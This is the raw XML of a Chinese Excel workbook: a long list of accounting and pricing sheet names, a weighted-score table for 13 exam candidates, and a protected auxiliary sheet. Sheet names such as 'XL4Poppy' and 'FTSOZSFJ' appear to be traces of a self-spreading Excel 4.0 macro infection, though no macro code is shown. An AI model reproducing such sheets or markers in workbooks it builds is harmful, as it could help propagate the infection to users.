      <sheetName val="固定资产汇总表"/>
      <sheetName val="房屋建筑物"/>
      <sheetName val="构筑物"/>
      <sheetName val="机器设备"/>
      <sheetName val="车辆"/>
      <sheetName val="电子设备"/>
      <sheetName val="电源设备"/>
      <sheetName val="电信机械设备"/>
      <sheetName val="线路设备"/>
      <sheetName val="固定_土地"/>
      <sheetName val="土建工程"/>
      <sheetName val="设备安装"/>
      <sheetName val="固定资产清理"/>
      <sheetName val="待处理固定资产"/>
      <sheetName val="土地使用权"/>
      <sheetName val="其他无形资产"/>
      <sheetName val="开办费"/>
      <sheetName val="长期待摊费用"/>
      <sheetName val="其他长期资产"/>
      <sheetName val="递延税款借项"/>
      <sheetName val="流动负债汇总表"/>
      <sheetName val="短期借款"/>
      <sheetName val="应付票据"/>
      <sheetName val="应付帐款"/>
      <sheetName val="预收帐款"/>
      <sheetName val="Sheet2"/>
      <sheetName val="其他应付款"/>
      <sheetName val="应付工资"/>
      <sheetName val="应付福利费"/>
      <sheetName val="未交税金"/>
      <sheetName val="收支差额"/>
      <sheetName val="未付利润"/>
      <sheetName val="其它未交款"/>
      <sheetName val="预提费用"/>
      <sheetName val="一年内到期长期负债"/>
      <sheetName val="其他流动负债"/>
      <sheetName val="长期负债汇总表"/>
      <sheetName val="长期借款"/>
      <sheetName val="应付债券"/>
      <sheetName val="长期应付款"/>
      <sheetName val="其他长期负债"/>
      <sheetName val="递延税款贷项"/>
      <sheetName val="XL4Poppy"/>
      <sheetName v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定额"/>
      <sheetName val="台时"/>
      <sheetName val="材料"/>
      <sheetName val="工程量清单1"/>
      <sheetName val="工程量清单2"/>
      <sheetName val="钢管加工厂"/>
      <sheetName val="压力钢管制作单价"/>
      <sheetName val="安装单价2"/>
      <sheetName val="安装单价"/>
      <sheetName val="单价L"/>
      <sheetName val="单价2"/>
      <sheetName val="Sheet2"/>
      <sheetName val="Sheet4"/>
      <sheetName val="单价n2"/>
      <sheetName val="单价n3"/>
      <sheetName val="单价n1"/>
      <sheetName val="单价X"/>
      <sheetName val="单价1"/>
      <sheetName val="报价汇总表"/>
      <sheetName val="总价单价"/>
      <sheetName val="报价基础"/>
      <sheetName val="主材价计算"/>
      <sheetName val="台时汇总"/>
      <sheetName val="单价汇总"/>
      <sheetName val="运杂费汇总"/>
      <sheetName val="进退场费"/>
      <sheetName val="资金流"/>
      <sheetName val="材料用量"/>
      <sheetName val="取费"/>
      <sheetName val="素砼单价"/>
      <sheetName val="工时费"/>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solidFill>
          <a:srgbClr val="FFFFFF"/>
        </a:solidFill>
        <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:roun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tabSelected="1" workbookViewId="0">
      <selection activeCell="P6" sqref="P6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="4.5" style="20" customWidth="1"/>
    <col min="2" max="2" width="8" style="23" customWidth="1"/>
    <col min="3" max="3" width="6.5" style="24" customWidth="1"/>
    <col min="4" max="4" width="11.75" style="25" customWidth="1"/>
    <col min="5" max="5" width="6.25" style="24" customWidth="1"/>
    <col min="6" max="6" width="5.875" style="20" customWidth="1"/>
    <col min="7" max="7" width="14.125" style="20" customWidth="1"/>
    <col min="8" max="8" width="14" style="20" customWidth="1"/>
    <col min="9" max="50" width="10" style="20" customWidth="1"/>
    <col min="51" max="16303" width="1.25" style="20"/>
    <col min="16304" max="16384" width="9" style="20"/>
  </cols>
  <sheetData>
    <row r="1" s="20" customFormat="1" ht="30" customHeight="1" spans="1:11">
      <c r="A1" s="26" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="26"/>
      <c r="C1" s="26"/>
      <c r="D1" s="26"/>
      <c r="E1" s="26"/>
      <c r="F1" s="26"/>
      <c r="G1" s="26"/>
      <c r="H1" s="26"/>
      <c r="I1" s="26"/>
      <c r="J1" s="26"/>
      <c r="K1" s="26"/>
    </row>
    <row r="2" s="21" customFormat="1" ht="78" customHeight="1" spans="1:11">
      <c r="A2" s="12" t="s">
        <v>1</v>
      </c>
      <c r="B2" s="12" t="s">
        <v>2</v>
      </c>
      <c r="C2" s="13" t="s">
        <v>3</v>
      </c>
      <c r="D2" s="14" t="s">
        <v>4</v>
      </c>
      <c r="E2" s="13" t="s">
        <v>5</v>
      </c>
      <c r="F2" s="15" t="s">
        <v>6</v>
      </c>
      <c r="G2" s="15" t="s">
        <v>7</v>
      </c>
      <c r="H2" s="15" t="s">
        <v>8</v>
      </c>
      <c r="I2" s="15" t="s">
        <v>9</v>
      </c>
      <c r="J2" s="15" t="s">
        <v>10</v>
      </c>
      <c r="K2" s="15" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="3" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A3" s="27">
        <v>1</v>
      </c>
      <c r="B3" s="16" t="s">
        <v>12</v>
      </c>
      <c r="C3" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D3" s="18">
        <v>2021000002</v>
      </c>
      <c r="E3" s="17">
        <v>87.5</v>
      </c>
      <c r="F3" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G3" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H3" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I3" s="19">
        <v>1</v>
      </c>
      <c r="J3" s="19">
        <v>78.8</v>
      </c>
      <c r="K3" s="19">
        <f>E3*2/3*0.6+J3*0.4</f>
        <v>66.52</v>
      </c>
    </row>
    <row r="4" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A4" s="27">
        <v>2</v>
      </c>
      <c r="B4" s="16" t="s">
        <v>17</v>
      </c>
      <c r="C4" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D4" s="18">
        <v>2021000015</v>
      </c>
      <c r="E4" s="17">
        <v>90</v>
      </c>
      <c r="F4" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G4" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H4" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I4" s="19">
        <v>2</v>
      </c>
      <c r="J4" s="19">
        <v>73</v>
      </c>
      <c r="K4" s="19">
        <f t="shared" ref="K4:K15" si="0">E4*2/3*0.6+J4*0.4</f>
        <v>65.2</v>
      </c>
    </row>
    <row r="5" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A5" s="27">
        <v>3</v>
      </c>
      <c r="B5" s="16" t="s">
        <v>18</v>
      </c>
      <c r="C5" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D5" s="18">
        <v>2021000003</v>
      </c>
      <c r="E5" s="17">
        <v>98.5</v>
      </c>
      <c r="F5" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G5" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H5" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I5" s="19">
        <v>3</v>
      </c>
      <c r="J5" s="19">
        <v>68.6</v>
      </c>
      <c r="K5" s="19">
        <f t="shared" si="0"/>
        <v>66.84</v>
      </c>
    </row>
    <row r="6" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A6" s="27">
        <v>4</v>
      </c>
      <c r="B6" s="16" t="s">
        <v>19</v>
      </c>
      <c r="C6" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D6" s="18">
        <v>2021000006</v>
      </c>
      <c r="E6" s="17">
        <v>87</v>
      </c>
      <c r="F6" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G6" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H6" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I6" s="19">
        <v>4</v>
      </c>
      <c r="J6" s="19">
        <v>70.6</v>
      </c>
      <c r="K6" s="19">
        <f t="shared" si="0"/>
        <v>63.04</v>
      </c>
    </row>
    <row r="7" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A7" s="27">
        <v>5</v>
      </c>
      <c r="B7" s="16" t="s">
        <v>20</v>
      </c>
      <c r="C7" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D7" s="18">
        <v>2021000014</v>
      </c>
      <c r="E7" s="17">
        <v>79</v>
      </c>
      <c r="F7" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G7" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H7" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I7" s="19">
        <v>5</v>
      </c>
      <c r="J7" s="19">
        <v>75.8</v>
      </c>
      <c r="K7" s="19">
        <f t="shared" si="0"/>
        <v>61.92</v>
      </c>
    </row>
    <row r="8" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A8" s="27">
        <v>6</v>
      </c>
      <c r="B8" s="16" t="s">
        <v>21</v>
      </c>
      <c r="C8" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D8" s="18">
        <v>2021000008</v>
      </c>
      <c r="E8" s="17">
        <v>91.5</v>
      </c>
      <c r="F8" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G8" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H8" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I8" s="19">
        <v>6</v>
      </c>
      <c r="J8" s="19">
        <v>77.2</v>
      </c>
      <c r="K8" s="19">
        <f t="shared" si="0"/>
        <v>67.48</v>
      </c>
    </row>
    <row r="9" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A9" s="27">
        <v>7</v>
      </c>
      <c r="B9" s="16" t="s">
        <v>22</v>
      </c>
      <c r="C9" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D9" s="18">
        <v>2021000007</v>
      </c>
      <c r="E9" s="17">
        <v>92.5</v>
      </c>
      <c r="F9" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G9" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H9" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I9" s="19">
        <v>7</v>
      </c>
      <c r="J9" s="19">
        <v>82.4</v>
      </c>
      <c r="K9" s="19">
        <f t="shared" si="0"/>
        <v>69.96</v>
      </c>
    </row>
    <row r="10" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A10" s="27">
        <v>8</v>
      </c>
      <c r="B10" s="16" t="s">
        <v>23</v>
      </c>
      <c r="C10" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D10" s="18">
        <v>2021000009</v>
      </c>
      <c r="E10" s="17">
        <v>70</v>
      </c>
      <c r="F10" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G10" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H10" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I10" s="19">
        <v>8</v>
      </c>
      <c r="J10" s="19">
        <v>67.8</v>
      </c>
      <c r="K10" s="19">
        <f t="shared" si="0"/>
        <v>55.12</v>
      </c>
    </row>
    <row r="11" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A11" s="27">
        <v>9</v>
      </c>
      <c r="B11" s="16" t="s">
        <v>24</v>
      </c>
      <c r="C11" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D11" s="18">
        <v>2021000010</v>
      </c>
      <c r="E11" s="17">
        <v>97</v>
      </c>
      <c r="F11" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G11" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H11" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I11" s="19">
        <v>9</v>
      </c>
      <c r="J11" s="19">
        <v>77.2</v>
      </c>
      <c r="K11" s="19">
        <f t="shared" si="0"/>
        <v>69.68</v>
      </c>
    </row>
    <row r="12" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A12" s="27">
        <v>10</v>
      </c>
      <c r="B12" s="16" t="s">
        <v>25</v>
      </c>
      <c r="C12" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D12" s="18">
        <v>2021000011</v>
      </c>
      <c r="E12" s="17">
        <v>83.5</v>
      </c>
      <c r="F12" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G12" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H12" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I12" s="19">
        <v>10</v>
      </c>
      <c r="J12" s="19">
        <v>71</v>
      </c>
      <c r="K12" s="19">
        <f t="shared" si="0"/>
        <v>61.8</v>
      </c>
    </row>
    <row r="13" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A13" s="27">
        <v>11</v>
      </c>
      <c r="B13" s="16" t="s">
        <v>26</v>
      </c>
      <c r="C13" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D13" s="18">
        <v>2021000004</v>
      </c>
      <c r="E13" s="17">
        <v>81</v>
      </c>
      <c r="F13" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G13" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H13" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I13" s="19">
        <v>11</v>
      </c>
      <c r="J13" s="19">
        <v>69.4</v>
      </c>
      <c r="K13" s="19">
        <f t="shared" si="0"/>
        <v>60.16</v>
      </c>
    </row>
    <row r="14" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A14" s="27">
        <v>12</v>
      </c>
      <c r="B14" s="16" t="s">
        <v>27</v>
      </c>
      <c r="C14" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D14" s="18">
        <v>2021000005</v>
      </c>
      <c r="E14" s="17">
        <v>70.5</v>
      </c>
      <c r="F14" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G14" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H14" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I14" s="19">
        <v>12</v>
      </c>
      <c r="J14" s="19">
        <v>69</v>
      </c>
      <c r="K14" s="19">
        <f t="shared" si="0"/>
        <v>55.8</v>
      </c>
    </row>
    <row r="15" s="22" customFormat="1" ht="24" customHeight="1" spans="1:11">
      <c r="A15" s="27">
        <v>13</v>
      </c>
      <c r="B15" s="16" t="s">
        <v>28</v>
      </c>
      <c r="C15" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D15" s="18">
        <v>2021000013</v>
      </c>
      <c r="E15" s="17">
        <v>64</v>
      </c>
      <c r="F15" s="19" t="s">
        <v>14</v>
      </c>
      <c r="G15" s="19" t="s">
        <v>15</v>
      </c>
      <c r="H15" s="19" t="s">
        <v>16</v>
      </c>
      <c r="I15" s="19">
        <v>13</v>
      </c>
      <c r="J15" s="19">
        <v>68.4</v>
      </c>
      <c r="K15" s="19">
        <f t="shared" si="0"/>
        <v>52.96</v>
      </c>
    </row>
    <row r="16" ht="45" customHeight="1" spans="1:7">
      <c r="A16" s="28"/>
      <c r="B16" s="28"/>
      <c r="C16" s="28"/>
      <c r="G16" s="29"/>
    </row>
  </sheetData>
  <sortState ref="B3:K28">
    <sortCondition ref="D3:D28"/>
  </sortState>
  <mergeCells count="2">
    <mergeCell ref="A1:K1"/>
    <mergeCell ref="A16:C16"/>
  </mergeCells>
  <pageMargins left="0.354166666666667" right="0.288888888888889" top="0.429166666666667" bottom="0.590277777777778" header="0.36875" footer="0.438888888888889"/>
  <pageSetup paperSize="9" fitToWidth="22" fitToHeight="2" orientation="portrait" horizontalDpi="600" verticalDpi="6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H15"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A3" sqref="A3:H15"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25" outlineLevelCol="7"/>
  <cols>
    <col min="3" max="3" width="10.125"/>
  </cols>
  <sheetData>
    <row r="2" ht="40.5" spans="1:8">
      <c r="A2" s="12" t="s">
        <v>2</v>
      </c>
      <c r="B2" s="13" t="s">
        <v>3</v>
      </c>
      <c r="C2" s="14" t="s">
        <v>4</v>
      </c>
      <c r="D2" s="13" t="s">
        <v>5</v>
      </c>
      <c r="E2" s="15" t="s">
        <v>6</v>
      </c>
      <c r="F2" s="15" t="s">
        <v>7</v>
      </c>
      <c r="G2" s="15" t="s">
        <v>8</v>
      </c>
      <c r="H2" s="15" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="3" spans="1:8">
      <c r="A3" s="16" t="s">
        <v>12</v>
      </c>
      <c r="B3" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C3" s="18">
        <v>2021000002</v>
      </c>
      <c r="D3" s="17">
        <v>87.5</v>
      </c>
      <c r="E3" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F3" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G3" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H3" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="4" spans="1:8">
      <c r="A4" s="16" t="s">
        <v>17</v>
      </c>
      <c r="B4" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C4" s="18">
        <v>2021000015</v>
      </c>
      <c r="D4" s="17">
        <v>90</v>
      </c>
      <c r="E4" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F4" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G4" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H4" s="19">
        <v>2</v>
      </c>
    </row>
    <row r="5" spans="1:8">
      <c r="A5" s="16" t="s">
        <v>18</v>
      </c>
      <c r="B5" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C5" s="18">
        <v>2021000003</v>
      </c>
      <c r="D5" s="17">
        <v>98.5</v>
      </c>
      <c r="E5" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F5" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G5" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H5" s="19">
        <v>3</v>
      </c>
    </row>
    <row r="6" spans="1:8">
      <c r="A6" s="16" t="s">
        <v>19</v>
      </c>
      <c r="B6" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C6" s="18">
        <v>2021000006</v>
      </c>
      <c r="D6" s="17">
        <v>87</v>
      </c>
      <c r="E6" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F6" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G6" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H6" s="19">
        <v>4</v>
      </c>
    </row>
    <row r="7" spans="1:8">
      <c r="A7" s="16" t="s">
        <v>20</v>
      </c>
      <c r="B7" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C7" s="18">
        <v>2021000014</v>
      </c>
      <c r="D7" s="17">
        <v>79</v>
      </c>
      <c r="E7" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F7" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G7" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H7" s="19">
        <v>5</v>
      </c>
    </row>
    <row r="8" spans="1:8">
      <c r="A8" s="16" t="s">
        <v>21</v>
      </c>
      <c r="B8" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C8" s="18">
        <v>2021000008</v>
      </c>
      <c r="D8" s="17">
        <v>91.5</v>
      </c>
      <c r="E8" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F8" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G8" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H8" s="19">
        <v>6</v>
      </c>
    </row>
    <row r="9" spans="1:8">
      <c r="A9" s="16" t="s">
        <v>22</v>
      </c>
      <c r="B9" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C9" s="18">
        <v>2021000007</v>
      </c>
      <c r="D9" s="17">
        <v>92.5</v>
      </c>
      <c r="E9" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F9" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G9" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H9" s="19">
        <v>7</v>
      </c>
    </row>
    <row r="10" spans="1:8">
      <c r="A10" s="16" t="s">
        <v>23</v>
      </c>
      <c r="B10" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C10" s="18">
        <v>2021000009</v>
      </c>
      <c r="D10" s="17">
        <v>70</v>
      </c>
      <c r="E10" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F10" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G10" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H10" s="19">
        <v>8</v>
      </c>
    </row>
    <row r="11" spans="1:8">
      <c r="A11" s="16" t="s">
        <v>24</v>
      </c>
      <c r="B11" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C11" s="18">
        <v>2021000010</v>
      </c>
      <c r="D11" s="17">
        <v>97</v>
      </c>
      <c r="E11" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F11" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G11" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H11" s="19">
        <v>9</v>
      </c>
    </row>
    <row r="12" spans="1:8">
      <c r="A12" s="16" t="s">
        <v>25</v>
      </c>
      <c r="B12" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C12" s="18">
        <v>2021000011</v>
      </c>
      <c r="D12" s="17">
        <v>83.5</v>
      </c>
      <c r="E12" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F12" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G12" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H12" s="19">
        <v>10</v>
      </c>
    </row>
    <row r="13" spans="1:8">
      <c r="A13" s="16" t="s">
        <v>26</v>
      </c>
      <c r="B13" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C13" s="18">
        <v>2021000004</v>
      </c>
      <c r="D13" s="17">
        <v>81</v>
      </c>
      <c r="E13" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F13" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G13" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H13" s="19">
        <v>11</v>
      </c>
    </row>
    <row r="14" spans="1:8">
      <c r="A14" s="16" t="s">
        <v>27</v>
      </c>
      <c r="B14" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C14" s="18">
        <v>2021000005</v>
      </c>
      <c r="D14" s="17">
        <v>70.5</v>
      </c>
      <c r="E14" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F14" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G14" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H14" s="19">
        <v>12</v>
      </c>
    </row>
    <row r="15" spans="1:8">
      <c r="A15" s="16" t="s">
        <v>28</v>
      </c>
      <c r="B15" s="17" t="s">
        <v>13</v>
      </c>
      <c r="C15" s="18">
        <v>2021000013</v>
      </c>
      <c r="D15" s="17">
        <v>64</v>
      </c>
      <c r="E15" s="19" t="s">
        <v>14</v>
      </c>
      <c r="F15" s="19" t="s">
        <v>15</v>
      </c>
      <c r="G15" s="19" t="s">
        <v>16</v>
      </c>
      <c r="H15" s="19">
        <v>13</v>
      </c>
    </row>
  </sheetData>
  <sortState ref="A3:H15">
    <sortCondition ref="H3"/>
  </sortState>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showFormulas="1" workbookViewId="0">
      <selection activeCell="C1" sqref="C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.25" defaultRowHeight="12.75" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="26.875" style="1" customWidth="1"/>
    <col min="2" max="2" width="1.25" style="1" customWidth="1"/>
    <col min="3" max="3" width="28.875" style="1" customWidth="1"/>
    <col min="4" max="16384" width="8.25" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1">
      <c r="A1" s="2" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="2" ht="13.5" spans="1:1">
      <c r="A2" s="2" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="3" ht="13.5" spans="1:3">
      <c r="A3" s="3" t="s">
        <v>31</v>
      </c>
      <c r="C3" s="4" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="4" spans="1:1">
      <c r="A4" s="3" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="6" ht="13.5"/>
    <row r="7" spans="1:1">
      <c r="A7" s="5" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="8" spans="1:1">
      <c r="A8" s="6" t="s">
        <v>34</v>
      </c>
    </row>
    <row r="9" spans="1:1">
      <c r="A9" s="7" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="10" spans="1:1">
      <c r="A10" s="6" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="11" ht="13.5" spans="1:1">
      <c r="A11" s="8" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="13" ht="13.5"/>
    <row r="14" ht="13.5" spans="1:1">
      <c r="A14" s="4" t="s">
        <v>38</v>
      </c>
    </row>
    <row r="16" ht="13.5"/>
    <row r="17" ht="13.5" spans="3:3">
      <c r="C17" s="4" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="20" spans="1:1">
      <c r="A20" s="9" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="21" ht="14.25" spans="3:3">
      <c r="C21" s="10"/>
    </row>
    <row r="26" ht="13.5" spans="3:3">
      <c r="C26" s="11" t="s">
        <v>41</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection password="8863" sheet="1" objects="1" scenarios="1"/>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花名册</vt:lpstr>
      <vt:lpstr>Sheet1</vt:lpstr>
      <vt:lpstr>FTSOZSFJ</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干部股</dc:creator>
  <cp:lastModifiedBy>Weirdo ヾ</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-04T15:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-02-24T07:42:07Z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true</vt:bool>
  </property>
</Properties>
</file>